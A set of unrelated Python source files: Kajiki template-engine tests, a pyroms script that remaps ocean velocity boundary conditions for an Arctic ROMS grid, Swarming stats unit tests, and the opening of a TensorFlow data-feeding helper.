'i % 2',
ir.CaseNode(
'0',
ir.TextNode('even\n')),
ir.ElseNode(
ir.TextNode('odd\n')))))])
def test_basic(self):
tpl = kajiki.template.from_ir(self.tpl)
rsp = tpl(dict()).render()
assert rsp == '0 is even\n1 is odd\n', rsp
class TestFunction(TestCase):
def setUp(self):
self.tpl = ir.TemplateNode(
defs=[ir.DefNode(
'evenness(n)',
ir.IfNode(
'n % 2 == 0',
ir.TextNode('even')),
ir.ElseNode(
ir.TextNode('odd'))),
ir.DefNode(
'__main__()',
ir.ForNode(
'i in range(2)',
ir.ExprNode('i'),
ir.TextNode(' is '),
ir.ExprNode('evenness(i)'),
ir.TextNode('\n')))])
def test_basic(self):
tpl = kajiki.template.from_ir(self.tpl)
rsp = tpl(dict(name='Rick')).render()
assert rsp == '0 is even\n1 is odd\n', rsp
class TestCall(TestCase):
def setUp(self):
self.tpl = ir.TemplateNode(
defs=[ir.DefNode(
'quote(caller, speaker)',
ir.ForNode(
'i in range(2)',
ir.TextNode('Quoth '),
ir.ExprNode('speaker'),
ir.TextNode(', "'),
ir.ExprNode('caller(i)'),
ir.TextNode('."\n'))),
ir.DefNode(
'__main__()',
ir.CallNode(
'$caller(n)',
"quote($caller, 'the raven')",
ir.TextNode('Nevermore '),
ir.ExprNode('n')))])
def test_basic(self):
tpl = kajiki.template.from_ir(self.tpl)
rsp = tpl(dict(name='Rick')).render()
assert (
rsp == 'Quoth the raven, "Nevermore 0."\n'
'Quoth the raven, "Nevermore 1."\n'), rsp
class TestImport(TestCase):
def setUp(self):
lib = ir.TemplateNode(
defs=[ir.DefNode(
'evenness(n)',
ir.IfNode(
'n % 2 == 0',
ir.TextNode('even')),
ir.ElseNode(
ir.TextNode('odd'))),
ir.DefNode(
'half_evenness(n)',
ir.TextNode(' half of '),
ir.ExprNode('n'),
ir.TextNode(' is '),
ir.ExprNode('evenness(n/2)'))])
tpl = ir.TemplateNode(
defs=[ir.DefNode(
'__main__()',
ir.ImportNode(
'lib.txt',
'simple_function'),
ir.ForNode(
'i in range(4)',
ir.ExprNode('i'),
ir.TextNode(' is '),
ir.ExprNode('simple_function.evenness(i)'),
ir.ExprNode('simple_function.half_evenness(i)'),
ir.TextNode('\n')))])
loader = kajiki.loader.MockLoader({
'lib.txt': kajiki.template.from_ir(lib),
'tpl.txt': kajiki.template.from_ir(tpl)})
self.tpl = loader.import_('tpl.txt')
def test_import(self):
rsp = self.tpl(dict(name='Rick')).render()
assert (rsp == '0 is even half of 0 is even\n'
'1 is odd half of 1 is odd\n'
'2 is even half of 2 is odd\n'
'3 is odd half of 3 is odd\n'), rsp
class TestInclude(TestCase):
def setUp(self):
hdr = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.TextNode('# header\n'))])
tpl = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.TextNode('a\n'),
ir.IncludeNode('hdr.txt'),
ir.TextNode('b\n'))])
loader = kajiki.loader.MockLoader({
'hdr.txt': kajiki.template.from_ir(hdr),
'tpl.txt': kajiki.template.from_ir(tpl)})
self.tpl = loader.import_('tpl.txt')
def test_include(self):
rsp = self.tpl(dict(name='Rick')).render()
assert rsp == 'a\n# header\nb\n', rsp
class TestExtends(TestCase):
def setUp(self):
parent_tpl = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.ExprNode('header()'),
ir.ExprNode('body()'),
ir.ExprNode('footer()')),
ir.DefNode(
'header()',
ir.TextNode('# Header name='),
ir.ExprNode('name'),
ir.TextNode('\n')),
ir.DefNode(
'body()',
ir.TextNode('## Parent Body\n'),
ir.TextNode('local.id() = '),
ir.ExprNode('local.id()'),
ir.TextNode('\n'),
ir.TextNode('self.id() = '),
ir.ExprNode('self.id()'),
ir.TextNode('\n'),
ir.TextNode('child.id() = '),
ir.ExprNode('child.id()'),
ir.TextNode('\n')),
ir.DefNode(
'footer()',
ir.TextNode('# Footer\n')),
ir.DefNode(
'id()',
ir.TextNode('parent'))])
mid_tpl = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.ExtendNode('parent.txt')),
ir.DefNode(
'id()',
ir.TextNode('mid'))])
child_tpl = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.ExtendNode('mid.txt')),
ir.DefNode(
'body()',
ir.TextNode('## Child Body\n'),
ir.ExprNode('parent.body()')),
ir.DefNode(
'id()',
ir.TextNode('child'))])
loader = kajiki.loader.MockLoader({
'parent.txt': kajiki.template.from_ir(parent_tpl),
'mid.txt': kajiki.template.from_ir(mid_tpl),
'child.txt': kajiki.template.from_ir(child_tpl)})
self.loader = loader
self.tpl = loader.import_('child.txt')
def test_extends(self):
rsp = self.tpl(dict(name='Rick')).render()
assert (rsp == '# Header name=Rick\n'
'## Child Body\n'
'## Parent Body\n'
'local.id() = parent\n'
'self.id() = child\n'
'child.id() = mid\n'
'# Footer\n'), rsp
class TestDynamicExtends(TestCase):
def setUp(self):
p0 = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.TextNode('Parent 0'))])
p1 = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.TextNode('Parent 1'))])
child = ir.TemplateNode(
defs=[
ir.DefNode(
'__main__()',
ir.IfNode(
'p==0',
ir.ExtendNode('parent0.txt')),
ir.ElseNode(
ir.ExtendNode('parent1.txt')))])
loader = kajiki.loader.MockLoader({
'parent0.txt': kajiki.template.from_ir(p0),
'parent1.txt': kajiki.template.from_ir(p1),
'child.txt': kajiki.template.from_ir(child)})
self.loader = loader
self.tpl = loader.import_('child.txt')
def test_extends(self):
rsp = self.tpl(dict(p=0)).render()
assert rsp == 'Parent 0', rsp
rsp = self.tpl(dict(p=1)).render()
assert rsp == 'Parent 1', rsp
if __name__ == '__main__':
main()
|
|
import numpy as np
import os
try:
import netCDF4 as netCDF
except:
import netCDF3 as netCDF
import matplotlib.pyplot as plt
import time
from datetime import datetime
from matplotlib.dates import date2num, num2date
import pyroms
import pyroms_toolbox
import _remapping
class nctime(object):
pass
def remap_bdry_uv(src_file, src_grd, dst_grd, dmax=0, cdepth=0, kk=0, dst_dir='./'):
# Arctic
ystart=240
# get time
nctime.long_name = 'time'
nctime.units = 'days since 1900-01-01 00:00:00'
# time reference "days since 1900-01-01 00:00:00"
ref = datetime(1900, 1, 1, 0, 0, 0)
ref = date2num(ref)
tag = src_file.rsplit('/')[-1].rsplit('_')[-1].rsplit('-')[0]
year = int(tag[:4])
month = int(tag[4:6])
day = int(tag[6:])
time = datetime(year, month, day, 0, 0, 0)
time = date2num(time)
time = time - ref
time = time + 2.5 # 5-day average
# get dimensions
Mp, Lp = dst_grd.hgrid.mask_rho.shape
# create destination file
dst_file = src_file.rsplit('/')[-1]
dst_fileu = dst_dir + dst_file[:-4] + '_u_bdry_' + dst_grd.name + '.nc'
print '\nCreating destination file', dst_fileu
if os.path.exists(dst_fileu) is True:
os.remove(dst_fileu)
pyroms_toolbox.nc_create_roms_file(dst_fileu, dst_grd, nctime)
dst_filev = dst_dir + dst_file[:-4] + '_v_bdry_' + dst_grd.name + '.nc'
print 'Creating destination file', dst_filev
if os.path.exists(dst_filev) is True:
os.remove(dst_filev)
pyroms_toolbox.nc_create_roms_file(dst_filev, dst_grd, nctime)
# open destination file
ncu = netCDF.Dataset(dst_fileu, 'a', format='NETCDF3_64BIT')
ncv = netCDF.Dataset(dst_filev, 'a', format='NETCDF3_64BIT')
#load var
cdf = netCDF.Dataset(src_file)
src_varu = cdf.variables['u']
src_varv = cdf.variables['v']
#get missing value
spval = src_varu._FillValue
# ARCTIC2 grid sub-sample
src_varu = src_varu[:]
src_varu = src_varu[:,np.r_[ystart:np.size(src_varu,1),-1],:]
src_varv = src_varv[:]
src_varv = src_varv[:,np.r_[ystart:np.size(src_varv,1),-1],:]
# get weights file
wts_file = 'remap_weights_SODA_2.1.6_to_ARCTIC2_bilinear_uv_to_rho.nc'
# build intermediate zgrid
zlevel = -src_grd.z_t[::-1,0,0]
nzlevel = len(zlevel)
dst_zcoord = pyroms.vgrid.z_coordinate(dst_grd.vgrid.h, zlevel, nzlevel)
dst_grdz = pyroms.grid.ROMS_Grid(dst_grd.name+'_Z', dst_grd.hgrid, dst_zcoord)
# create variable in destination file
print 'Creating variable u_north'
ncu.createVariable('u_north', 'f8', ('ocean_time', 's_rho', 'xi_u'), fill_value=spval)
ncu.variables['u_north'].long_name = '3D u-momentum north boundary condition'
ncu.variables['u_north'].units = 'meter second-1'
ncu.variables['u_north'].field = 'u_north, scalar, series'
#ncu.variables['u_north']._FillValue = spval
print 'Creating variable u_south'
ncu.createVariable('u_south', 'f8', ('ocean_time', 's_rho', 'xi_u'), fill_value=spval)
ncu.variables['u_south'].long_name = '3D u-momentum south boundary condition'
ncu.variables['u_south'].units = 'meter second-1'
ncu.variables['u_south'].field = 'u_south, scalar, series'
#ncu.variables['u_south']._FillValue = spval
print 'Creating variable u_east'
ncu.createVariable('u_east', 'f8', ('ocean_time', 's_rho', 'eta_u'), fill_value=spval)
ncu.variables['u_east'].long_name = '3D u-momentum east boundary condition'
ncu.variables['u_east'].units = 'meter second-1'
ncu.variables['u_east'].field = 'u_east, scalar, series'
#ncu.variables['u_east']._FillValue = spval
print 'Creating variable u_west'
ncu.createVariable('u_west', 'f8', ('ocean_time', 's_rho', 'eta_u'), fill_value=spval)
ncu.variables['u_west'].long_name = '3D u-momentum west boundary condition'
ncu.variables['u_west'].units = 'meter second-1'
ncu.variables['u_west'].field = 'u_east, scalar, series'
#ncu.variables['u_west']._FillValue = spval
# create variable in destination file
print 'Creating variable ubar_north'
ncu.createVariable('ubar_north', 'f8', ('ocean_time', 'xi_u'), fill_value=spval)
ncu.variables['ubar_north'].long_name = '2D u-momentum north boundary condition'
ncu.variables['ubar_north'].units = 'meter second-1'
ncu.variables['ubar_north'].field = 'ubar_north, scalar, series'
#ncu.variables['ubar_north']._FillValue = spval
print 'Creating variable ubar_south'
ncu.createVariable('ubar_south', 'f8', ('ocean_time', 'xi_u'), fill_value=spval)
ncu.variables['ubar_south'].long_name = '2D u-momentum south boundary condition'
ncu.variables['ubar_south'].units = 'meter second-1'
ncu.variables['ubar_south'].field = 'ubar_south, scalar, series'
#ncu.variables['ubar_south']._FillValue = spval
print 'Creating variable ubar_east'
ncu.createVariable('ubar_east', 'f8', ('ocean_time', 'eta_u'), fill_value=spval)
ncu.variables['ubar_east'].long_name = '2D u-momentum east boundary condition'
ncu.variables['ubar_east'].units = 'meter second-1'
ncu.variables['ubar_east'].field = 'ubar_east, scalar, series'
#ncu.variables['ubar_east']._FillValue = spval
print 'Creating variable ubar_west'
ncu.createVariable('ubar_west', 'f8', ('ocean_time', 'eta_u'), fill_value=spval)
ncu.variables['ubar_west'].long_name = '2D u-momentum west boundary condition'
ncu.variables['ubar_west'].units = 'meter second-1'
ncu.variables['ubar_west'].field = 'ubar_east, scalar, series'
#ncu.variables['ubar_west']._FillValue = spval
print 'Creating variable v_north'
ncv.createVariable('v_north', 'f8', ('ocean_time', 's_rho', 'xi_v'), fill_value=spval)
ncv.variables['v_north'].long_name = '3D v-momentum north boundary condition'
ncv.variables['v_north'].units = 'meter second-1'
ncv.variables['v_north'].field = 'v_north, scalar, series'
#ncv.variables['v_north']._FillValue = spval
print 'Creating variable v_south'
ncv.createVariable('v_south', 'f8', ('ocean_time', 's_rho', 'xi_v'), fill_value=spval)
ncv.variables['v_south'].long_name = '3D v-momentum south boundary condition'
ncv.variables['v_south'].units = 'meter second-1'
ncv.variables['v_south'].field = 'v_south, scalar, series'
#ncv.variables['v_south']._FillValue = spval
print 'Creating variable v_east'
ncv.createVariable('v_east', 'f8', ('ocean_time', 's_rho', 'eta_v'), fill_value=spval)
ncv.variables['v_east'].long_name = '3D v-momentum east boundary condition'
ncv.variables['v_east'].units = 'meter second-1'
ncv.variables['v_east'].field = 'v_east, scalar, series'
#ncv.variables['v_east']._FillValue = spval
print 'Creating variable v_west'
ncv.createVariable('v_west', 'f8', ('ocean_time', 's_rho', 'eta_v'), fill_value=spval)
ncv.variables['v_west'].long_name = '3D v-momentum west boundary condition'
ncv.variables['v_west'].units = 'meter second-1'
ncv.variables['v_west'].field = 'v_east, scalar, series'
#ncv.variables['v_west']._FillValue = spval
print 'Creating variable vbar_north'
ncv.createVariable('vbar_north', 'f8', ('ocean_time', 'xi_v'), fill_value=spval)
ncv.variables['vbar_north'].long_name = '2D v-momentum north boundary condition'
ncv.variables['vbar_north'].units = 'meter second-1'
ncv.variables['vbar_north'].field = 'vbar_north, scalar, series'
#ncv.variables['vbar_north']._FillValue = spval
print 'Creating variable vbar_south'
ncv.createVariable('vbar_south', 'f8', ('ocean_time', 'xi_v'), fill_value=spval)
ncv.variables['vbar_south'].long_name = '2D v-momentum south boundary condition'
ncv.variables['vbar_south'].units = 'meter second-1'
ncv.variables['vbar_south'].field = 'vbar_south, scalar, series'
#ncv.variables['vbar_south']._FillValue = spval
print 'Creating variable vbar_east'
ncv.createVariable('vbar_east', 'f8', ('ocean_time', 'eta_v'), fill_value=spval)
ncv.variables['vbar_east'].long_name = '2D v-momentum east boundary condition'
ncv.variables['vbar_east'].units = 'meter second-1'
ncv.variables['vbar_east'].field = 'vbar_east, scalar, series'
#ncv.variables['vbar_east']._FillValue = spval
print 'Creating variable vbar_west'
ncv.createVariable('vbar_west', 'f8', ('ocean_time', 'eta_v'), fill_value=spval)
ncv.variables['vbar_west'].long_name = '2D v-momentum west boundary condition'
ncv.variables['vbar_west'].units = 'meter second-1'
ncv.variables['vbar_west'].field = 'vbar_east, scalar, series'
#ncv.variables['vbar_west']._FillValue = spval
# remaping
print 'remapping and rotating u and v from', src_grd.name, \
'to', dst_grd.name
print 'time =', time
# flood the grid
print 'flood the grid'
src_uz = pyroms_toolbox.BGrid_SODA.flood(src_varu, src_grd, Bpos='uv', \
spval=spval, dmax=dmax, cdepth=cdepth, kk=kk)
src_vz = pyroms_toolbox.BGrid_SODA.flood(src_varv, src_grd, Bpos='uv', \
spval=spval, dmax=dmax, cdepth=cdepth, kk=kk)
# horizontal interpolation using scrip weights
print 'horizontal interpolation using scrip weights'
dst_uz = pyroms.remapping.remap(src_uz, wts_file, \
spval=spval)
dst_vz = pyroms.remapping.remap(src_vz, wts_file, \
spval=spval)
# vertical interpolation from standard z level to sigma
print 'vertical interpolation from standard z level to sigma'
dst_u_north = pyroms.remapping.z2roms(dst_uz[::-1, Mp-2:Mp, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(Mp-2,Mp))
dst_u_south = pyroms.remapping.z2roms(dst_uz[::-1, 0:2, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(0,2))
dst_u_east = pyroms.remapping.z2roms(dst_uz[::-1, 0:Mp, Lp-2:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(Lp-2,Lp), jrange=(0,Mp))
dst_u_west = pyroms.remapping.z2roms(dst_uz[::-1, 0:Mp, 0:2], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,2), jrange=(0,Mp))
dst_v_north = pyroms.remapping.z2roms(dst_vz[::-1, Mp-2:Mp, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(Mp-2,Mp))
dst_v_south = pyroms.remapping.z2roms(dst_vz[::-1, 0:2, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(0,2))
dst_v_east = pyroms.remapping.z2roms(dst_vz[::-1, 0:Mp, Lp-2:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(Lp-2,Lp), jrange=(0,Mp))
dst_v_west = pyroms.remapping.z2roms(dst_vz[::-1, 0:Mp, 0:2], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,2), jrange=(0,Mp))
# rotate u,v fields
src_angle = np.zeros(dst_grd.hgrid.angle_rho.shape)
dst_angle = dst_grd.hgrid.angle_rho
angle = dst_angle - src_angle
angle = np.tile(angle, (dst_grd.vgrid.N, 1, 1))
U_north = dst_u_north + dst_v_north*1j
eitheta_north = np.exp(-1j*angle[:,Mp-2:Mp, 0:Lp])
U_north = U_north * eitheta_north
dst_u_north = np.real(U_north)
dst_v_north = np.imag(U_north)
U_south = dst_u_south + dst_v_south*1j
eitheta_south = np.exp(-1j*angle[:,0:2, 0:Lp])
U_south = U_south * eitheta_south
dst_u_south = np.real(U_south)
dst_v_south = np.imag(U_south)
U_east = dst_u_east + dst_v_east*1j
eitheta_east = np.exp(-1j*angle[:,0:Mp, Lp-2:Lp])
U_east = U_east * eitheta_east
dst_u_east = np.real(U_east)
dst_v_east = np.imag(U_east)
U_west = dst_u_west + dst_v_west*1j
eitheta_west = np.exp(-1j*angle[:,0:Mp, 0:2])
U_west = U_west * eitheta_west
dst_u_west = np.real(U_west)
dst_v_west = np.imag(U_west)
# move back to u,v points
dst_u_north = 0.5 * np.squeeze(dst_u_north[:,-1,:-1] + dst_u_north[:,-1,1:])
dst_v_north = 0.5 * np.squeeze(dst_v_north[:,:-1,:] + dst_v_north[:,1:,:])
dst_u_south = 0.5 * np.squeeze(dst_u_south[:,0,:-1] + dst_u_south[:,0,1:])
dst_v_south = 0.5 * np.squeeze(dst_v_south[:,:-1,:] + dst_v_south[:,1:,:])
dst_u_east = 0.5 * np.squeeze(dst_u_east[:,:,:-1] + dst_u_east[:,:,1:])
dst_v_east = 0.5 * np.squeeze(dst_v_east[:,:-1,-1] + dst_v_east[:,1:,-1])
dst_u_west = 0.5 * np.squeeze(dst_u_west[:,:,:-1] + dst_u_west[:,:,1:])
dst_v_west = 0.5 * np.squeeze(dst_v_west[:,:-1,0] + dst_v_west[:,1:,0])
# spval
idxu_north = np.where(dst_grd.hgrid.mask_u[-1,:] == 0)
idxv_north = np.where(dst_grd.hgrid.mask_v[-1,:] == 0)
idxu_south = np.where(dst_grd.hgrid.mask_u[0,:] == 0)
idxv_south = np.where(dst_grd.hgrid.mask_v[0,:] == 0)
idxu_east = np.where(dst_grd.hgrid.mask_u[:,-1] == 0)
idxv_east = np.where(dst_grd.hgrid.mask_v[:,-1] == 0)
idxu_west = np.where(dst_grd.hgrid.mask_u[:,0] == 0)
idxv_west = np.where(dst_grd.hgrid.mask_v[:,0] == 0)
for n in range(dst_grd.vgrid.N):
dst_u_north[n, idxu_north[0]] = spval
dst_v_north[n, idxv_north[0]] = spval
dst_u_south[n, idxu_south[0]] = spval
dst_v_south[n, idxv_south[0]] = spval
dst_u_east[n, idxu_east[0]] = spval
dst_v_east[n, idxv_east[0]] = spval
dst_u_west[n, idxu_west[0]] = spval
dst_v_west[n, idxv_west[0]] = spval
# compute depth average velocity ubar and vbar
# get z at the right position
z_u_north = 0.5 * (dst_grd.vgrid.z_w[0,:,-1,:-1] + dst_grd.vgrid.z_w[0,:,-1,1:])
z_v_north = 0.5 * (dst_grd.vgrid.z_w[0,:,-1,:] + dst_grd.vgrid.z_w[0,:,-2,:])
z_u_south = 0.5 * (dst_grd.vgrid.z_w[0,:,0,:-1] + dst_grd.vgrid.z_w[0,:,0,1:])
z_v_south = 0.5 * (dst_grd.vgrid.z_w[0,:,0,:] + dst_grd.vgrid.z_w[0,:,1,:])
z_u_east = 0.5 * (dst_grd.vgrid.z_w[0,:,:,-1] + dst_grd.vgrid.z_w[0,:,:,-2])
z_v_east = 0.5 * (dst_grd.vgrid.z_w[0,:,:-1,-1] + dst_grd.vgrid.z_w[0,:,1:,-1])
z_u_west = 0.5 * (dst_grd.vgrid.z_w[0,:,:,0] + dst_grd.vgrid.z_w[0,:,:,1])
z_v_west = 0.5 * (dst_grd.vgrid.z_w[0,:,:-1,0] + dst_grd.vgrid.z_w[0,:,1:,0])
dst_ubar_north = np.zeros(dst_u_north.shape[1])
dst_ubar_south = np.zeros(dst_u_south.shape[1])
dst_ubar_east = np.zeros(dst_u_east.shape[1])
dst_ubar_west = np.zeros(dst_u_west.shape[1])
dst_vbar_north = np.zeros(dst_v_north.shape[1])
dst_vbar_south = np.zeros(dst_v_south.shape[1])
dst_vbar_east = np.zeros(dst_v_east.shape[1])
dst_vbar_west = np.zeros(dst_v_west.shape[1])
for i in range(dst_u_north.shape[1]):
dst_ubar_north[i] = (dst_u_north[:,i] * np.diff(z_u_north[:,i])).sum() / -z_u_north[0,i]
dst_ubar_south[i] = (dst_u_south[:,i] * np.diff(z_u_south[:,i])).sum() / -z_u_south[0,i]
for i in range(dst_v_north.shape[1]):
dst_vbar_north[i] = (dst_v_north[:,i] * np.diff(z_v_north[:,i])).sum() / -z_v_north[0,i]
dst_vbar_south[i] = (dst_v_south[:,i] * np.diff(z_v_south[:,i])).sum() / -z_v_south[0,i]
for j in range(dst_u_east.shape[1]):
dst_ubar_east[j] = (dst_u_east[:,j] * np.diff(z_u_east[:,j])).sum() / -z_u_east[0,j]
dst_ubar_west[j] = (dst_u_west[:,j] * np.diff(z_u_west[:,j])).sum() / -z_u_west[0,j]
for j in range(dst_v_east.shape[1]):
dst_vbar_east[j] = (dst_v_east[:,j] * np.diff(z_v_east[:,j])).sum() / -z_v_east[0,j]
dst_vbar_west[j] = (dst_v_west[:,j] * np.diff(z_v_west[:,j])).sum() / -z_v_west[0,j]
#mask
dst_ubar_north = np.ma.masked_where(dst_grd.hgrid.mask_u[-1,:] == 0, dst_ubar_north)
dst_ubar_south = np.ma.masked_where(dst_grd.hgrid.mask_u[0,:] == 0, dst_ubar_south)
dst_ubar_east = np.ma.masked_where(dst_grd.hgrid.mask_u[:,-1] == 0, dst_ubar_east)
dst_ubar_west = np.ma.masked_where(dst_grd.hgrid.mask_u[:,0] == 0, dst_ubar_west)
dst_vbar_north = np.ma.masked_where(dst_grd.hgrid.mask_v[-1,:] == 0, dst_vbar_north)
dst_vbar_south = np.ma.masked_where(dst_grd.hgrid.mask_v[0,:] == 0, dst_vbar_south)
dst_vbar_east = np.ma.masked_where(dst_grd.hgrid.mask_v[:,-1] == 0, dst_vbar_east)
dst_vbar_west = np.ma.masked_where(dst_grd.hgrid.mask_v[:,0] == 0, dst_vbar_west)
# write data in destination file
print 'write data in destination file'
ncu.variables['ocean_time'][0] = time
ncu.variables['u_north'][0] = dst_u_north
ncu.variables['u_south'][0] = dst_u_south
ncu.variables['u_east'][0] = dst_u_east
ncu.variables['u_west'][0] = dst_u_west
ncu.variables['ubar_north'][0] = dst_ubar_north
ncu.variables['ubar_south'][0] = dst_ubar_south
ncu.variables['ubar_east'][0] = dst_ubar_east
ncu.variables['ubar_west'][0] = dst_ubar_west
ncv.variables['ocean_time'][0] = time
ncv.variables['v_north'][0] = dst_v_north
ncv.variables['v_south'][0] = dst_v_south
ncv.variables['v_east'][0] = dst_v_east
ncv.variables['v_west'][0] = dst_v_west
ncv.variables['vbar_north'][0] = dst_vbar_north
ncv.variables['vbar_south'][0] = dst_vbar_south
ncv.variables['vbar_east'][0] = dst_vbar_east
ncv.variables['vbar_west'][0] = dst_vbar_west
# print dst_u.shape
# print dst_ubar.shape
# print dst_v.shape
# print dst_vbar.shape
# close file
ncu.close()
ncv.close()
cdf.close()
|
|
#!/usr/bin/env python
# Copyright 2014 The Swarming Authors. All rights reserved.
# Use of this source code is governed by the Apache v2.0 license that can be
# found in the LICENSE file.
import logging
import os
import sys
import unittest
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
import test_env
test_env.setup_test_env()
from server import stats
from support import test_case
# pylint: disable=W0212
class StatsPrivateTest(test_case.TestCase):
def _gen_data(self):
dimensions = {'os': 'Amiga', 'hostname': 'host3'}
# Description of the log entries:
# - host3 is idle
# - 100 was enqueue
# - 101 was started by host2
# - 101 was completed by host2
# - 201 had bot host1 died on it
# - 300 expired
# - 402 is running on host4
data = (
stats._pack_entry(action='bot_active', bot_id='host3', dimensions={}),
stats._pack_entry(action='bot_inactive', bot_id='failed1', dimensions={}),
stats._pack_entry(
action='task_enqueued', task_id='100', dimensions={}, user='me'),
stats._pack_entry(
action='run_started', run_id='101', bot_id='host2',
dimensions={}, pending_ms=1500, user='me'),
stats._pack_entry(
action='run_completed', run_id='101', bot_id='host2',
dimensions={}, runtime_ms=6000, user='me'),
stats._pack_entry(
action='task_completed', task_id='100',
dimensions={}, pending_ms=6000, user='me'),
stats._pack_entry(
action='run_bot_died', run_id='201', bot_id='host1',
dimensions=dimensions, user='joe'),
stats._pack_entry(
action='task_request_expired', task_id='300', dimensions={},
user='you'),
stats._pack_entry(
action='run_updated', run_id='402', bot_id='host4',
dimensions={}),
)
actions_tested = sorted(stats._unpack_entry(i)['action'] for i in data)
self.assertEqual(sorted(map(unicode, stats._VALID_ACTIONS)), actions_tested)
snapshot = stats._Snapshot()
bots_active = {}
bots_inactive = {}
tasks_active = {}
for line in data:
actual = stats._parse_line(
line, snapshot, bots_active, bots_inactive, tasks_active)
self.assertIs(True, actual, line)
stats._post_process(snapshot, bots_active, bots_inactive, tasks_active)
return snapshot
def test_parse_summary(self):
snapshot = self._gen_data()
expected = {
'bots_active': 3,
'bots_inactive': 1,
'http_failures': 0,
'http_requests': 0,
'tasks_active': 2,
'tasks_avg_pending_secs': 1.5,
'tasks_avg_runtime_secs': 6.0,
'tasks_bot_died': 1,
'tasks_completed': 1,
'tasks_enqueued': 1,
'tasks_pending_secs': 1.5,
'tasks_request_expired': 1,
'tasks_total_runtime_secs': 6.0,
'tasks_started': 1,
}
self.assertEqual(expected, snapshot.to_dict())
self.assertEqual(['host2', 'host3', 'host4'], snapshot.bot_ids)
def test_parse_dimensions(self):
snapshot = self._gen_data()
expected = [
{
'bots_active': 0,
'bots_inactive': 0,
'dimensions': '{"os":"Amiga"}',
'tasks_active': 0,
'tasks_avg_pending_secs': 0.0,
'tasks_avg_runtime_secs': 0.0,
'tasks_bot_died': 1,
'tasks_completed': 0,
'tasks_enqueued': 0,
'tasks_pending_secs': 0,
'tasks_request_expired': 0,
'tasks_total_runtime_secs': 0,
'tasks_started': 0,
},
{
'bots_active': 3,
'bots_inactive': 1,
'dimensions': '{}',
'tasks_active': 2,
'tasks_avg_pending_secs': 1.5,
'tasks_avg_runtime_secs': 6.0,
'tasks_bot_died': 0,
'tasks_completed': 1,
'tasks_enqueued': 1,
'tasks_pending_secs': 1.5,
'tasks_request_expired': 1,
'tasks_total_runtime_secs': 6.0,
'tasks_started': 1,
},
]
self.assertEqual(expected, [i.to_dict() for i in snapshot.buckets])
expected = [
[],
[u'host2', u'host3', u'host4'],
]
self.assertEqual(expected, [i.bot_ids for i in snapshot.buckets])
def test_parse_user(self):
snapshot = self._gen_data()
expected = [
{
'tasks_active': 0,
'tasks_avg_pending_secs': 0.0,
'tasks_avg_runtime_secs': 0.0,
'tasks_bot_died': 1,
'tasks_completed': 0,
'tasks_enqueued': 0,
'tasks_pending_secs': 0,
'tasks_request_expired': 0,
'tasks_total_runtime_secs': 0,
'tasks_started': 0,
'user': u'joe',
},
{
'tasks_active': 0,
'tasks_avg_pending_secs': 1.5,
'tasks_avg_runtime_secs': 6.0,
'tasks_bot_died': 0,
'tasks_completed': 1,
'tasks_enqueued': 1,
'tasks_pending_secs': 1.5,
'tasks_request_expired': 0,
'tasks_total_runtime_secs': 6.0,
'tasks_started': 1,
'user': u'me',
},
{
'tasks_active': 0,
'tasks_avg_pending_secs': 0.0,
'tasks_avg_runtime_secs': 0.0,
'tasks_bot_died': 0,
'tasks_completed': 0,
'tasks_enqueued': 0,
'tasks_pending_secs': 0,
'tasks_request_expired': 1,
'tasks_total_runtime_secs': 0,
'tasks_started': 0,
'user': u'you',
},
]
self.assertEqual(expected, [i.to_dict() for i in snapshot.users])
def test_parse_task_active(self):
# It is important to note that it is the request properties that are logged,
# not the bot properties.
data = (
stats._pack_entry(
action='run_updated', run_id='201', bot_id='host1',
dimensions={'os': 'Linux'}),
stats._pack_entry(
action='run_updated', run_id='201', bot_id='host1',
dimensions={'os': 'Linux'}),
stats._pack_entry(
action='run_updated', run_id='301', bot_id='host2',
dimensions={'os': 'Windows'}),
stats._pack_entry(
action='bot_active', bot_id='host3',
dimensions={'os': ['Windows', 'Windows-3.1']}),
stats._pack_entry(
action='bot_active', bot_id='host4',
dimensions={'os': ['Linux', 'Linux-12.04']}),
)
snapshot = stats._Snapshot()
bots_active = {}
bots_inactive = {}
tasks_active = {}
for line in data:
actual = stats._parse_line(
line, snapshot, bots_active, bots_inactive, tasks_active)
self.assertEqual(True, actual)
stats._post_process(snapshot, bots_active, bots_inactive, tasks_active)
expected = [
'{"os":"Linux"}',
'{"os":"Windows"}',
]
self.assertEqual(expected, [i.dimensions for i in snapshot.buckets])
self.assertEqual(0, len(snapshot.users))
if __name__ == '__main__':
logging.basicConfig(
level=logging.DEBUG if '-v' in sys.argv else logging.ERROR)
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
unittest.main()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Helper functions for enqueuing data from arrays and pandas `DataFrame`s."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import numpy as np
from tensorflow.contrib.learn.python.learn.dataframe.queues import feeding_queue_runner as fqr
